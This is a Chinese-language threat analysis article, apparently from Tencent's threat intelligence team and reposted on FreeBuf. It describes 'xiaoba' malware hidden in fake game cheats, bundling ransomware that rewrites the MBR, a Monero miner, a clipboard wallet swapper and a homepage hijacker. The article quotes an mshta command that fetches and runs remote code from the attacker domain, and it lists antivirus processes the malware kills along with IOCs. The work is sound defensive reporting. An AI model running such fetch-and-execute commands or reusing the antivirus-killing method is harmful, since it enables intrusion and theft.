freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

    装游戏辅助本想吃鸡,中挖矿病毒卡到死机
    2018-06-28 10:35:33
    所属地 广东省

    0x1 背景

    近日,腾讯御见威胁情报中心监控到“xiaoba”勒索病毒的作者在网站xiaobaruanjian.xyz上提供荒野行动游戏辅助,同时将勒索病毒、挖矿木马、篡改主页木马暗藏在其中,一旦下载运行了该网站的所谓吃鸡“辅助”软件,会导致浏览器主页被篡改、电脑CPU被大量占用挖矿。

    如果碰巧遇到中毒电脑有比特币、以太坊交易,病毒还会监视剪切板,当中毒电脑上发生比特币、以太坊币交易时,病毒会在交易瞬间将收款人地址替换为自己的,从而实现虚拟币交易抢劫。

    更恶劣的是,xiaoba病毒作者还增加了勒索病毒功能,会改写硬盘主引导记录(MBR),让电脑无法开机,要求受害人加QQ聊天付款后才能解除病毒封锁。

    1.jpg

    0x2 荒野行动设备解封工具.exe

    伪装成吃鸡游戏辅助工具的“荒野行动设备解封工具.cmd”,被打包为压缩包文件“荒野行动设备解封工具.exe”,该压缩包文件执行时会启动恶意脚本cmd。

    2.png

    “荒野行动设备解封工具.cmd”执行命令mshta.exe hxxp://xiaobaruanjian.xyz/XiaoBa/office 

    3.png

    hxxp://xiaobaruanjian.xyz/XiaoBa/office下载木马exe,木马伪装正规软件文件名。

    4.png

    木马运行后创建傀儡进程svchost.exe

    5.png

    木马从自身资源中获取PE ,然后将其写入傀儡进程

    6.png

    傀儡进程执行恶意代码,下载木马到Temp目录,修改文件创建时间,然后执行木马文件。

    7.png

    木马的各个子模块文件下载地址皆以base64加密形式保存在代码中,木马运行时解码出对应的URL,下载文件并启动进程。URL、进程、文件以及功能对应如下:

    8.png

    木马运行时的http请求

    9.png

    0x3 挖矿

    10.png

    矿池一:emergency.fee.xmrig.com 

    钱包一:48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD 

    钱包状态:

    11.png

    12.png

    矿池二:mine.ppxxmr.com:5555 

    钱包二:47XDhdPop9CMqSxnZsZv2ze9bg7HjxUx1YorwGCP5bqw4XBKGd6jWCA5rXV8XsJLNsaedqW1XjxvfQWg7tFV5wZWP66su1j

    挖矿状态:

    13.png

    检测杀毒软件,发现存在杀毒软件进程则向驱动EDriver.sys发送IOCTL码

    14.png

    尝试在驱动层结束杀软进程

    0628.png

    以下杀软进程会受影响:

    360Safe.exe

    ZhuDongFangYu.exe

    QQPCTary.exe

    kxetray.exe

    2345safe.exe

    BaiduSDTray.exe

    avp.exe

    360sd.exe

    360rp.exe 

    0x4 推广网址导航站

    篡改浏览器导航为hxxp://t.cn/Rmrtj7O 

    15.png

    病毒会针对以下浏览器进行劫持

    06281.png

    释放带某导航的桌面lnk

    16.png

    木马运行后在桌面释放大量推广lnk,同时挖矿占用大量CPU资源

    17.jpg

    0x5 替换钱包地址

    当检测到复制钱包地址的操作时,会用病毒作者自己的钱包地址去替换目标转帐地址,实现虚拟币钱包打劫。

    替换比特币地址

    18.png

    替换以太坊地址

    19.png

    0x6 绝地求生超强辅助.exe

    勒索

    修改MBR锁定计算机

    20.png

    勒索提示

    It's time to pay the money. Your computer is locked for special reasons.Contact QQ:3047861776 Get unlocked method, Your ID:

    中文翻译:是时候付钱了,你的电脑因特殊原因被锁定。联系QQ:3047861776获取解锁方法。

    21.png

    发送被勒索机器ID到hxxp://xiaobaruanjian.xyz/MBR/pass.php 

    22.png

    0x7 总结

    黑客“xiaoba”以制作投放“xiaoba”勒索病毒出名,在网上一直使用QQ号:3047861776。

    此次将挖矿,勒索等木马同时植入“吃鸡”类游戏外挂中进行传播,增加了受到攻击后的危害种类。

    木马作者公开建议使用者关闭杀毒软件,在这种情况下,荒野行动、绝地求生等“吃鸡”游戏玩家如果喜欢使用外挂,则有很高的几率中招。

    23.png

    0x8 安全建议

    1、 不使用来历不明的软件。因外挂程序带毒的比例远高于其他软件,游戏玩家应尽量不要使用外挂程序。

    2、 从网上下载的软件先使用腾讯电脑管家扫描。

    3、 玩游戏时,保持腾讯电脑管家为开启状态。

    24.png

    0x9 IOCs

    域名

    xiaobaruanjian.xyz

    url

    hxxp://xiaobaruanjian.xyz/xiaoba/lsass.png

    hxxp://xiaobaruanjian.xyz/xiaoba/runtimebroker.png

    hxxp://xiaobaruanjian.xyz/xiaoba/svchost.png

    hxxp://xiaobaruanjian.xyz/xiaoba/psok.hta

    hxxp://xiaobaruanjian.xyz/XiaoBa/office 

    hxxp://xiaobaruanjian.xyz/XiaoBa/RuntimeBroker.png

    hxxp://xiaobaruanjian.xyz/XMR/xmrig32.png

    hxxp://xiaobaruanjian.xyz/XMR/xmrig64.png

    hxxp://xiaobaruanjian.xyz/XMR/config.txt

    hxxp://xiaobaruanjian.xyz/MBR/pass.php

    md5

    7a936398ad04fae4458be48d8bc339d0

    1df1f79ea710eca9768f3013a0051e05

    2786b62a6e2f288f5c24446068c9fc87

    f3fe4dbe88bd0549c665ece769c44f17

    d62d111eeb9e59dfe4c10e58fe4a75a8

    1b737bf07f69ad9081c12ce0bbddb762

    7f9e74895018870fe667438337b4eeee

    8b32838c7d458c24299b3aa294262f2f 

    # 勒索病毒 # 挖矿木马
    本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
    被以下专辑收录,发现更多精彩内容
    + 收入我的专辑
    + 加入我的收藏
    相关推荐
    • 0 文章数
    • 0 关注者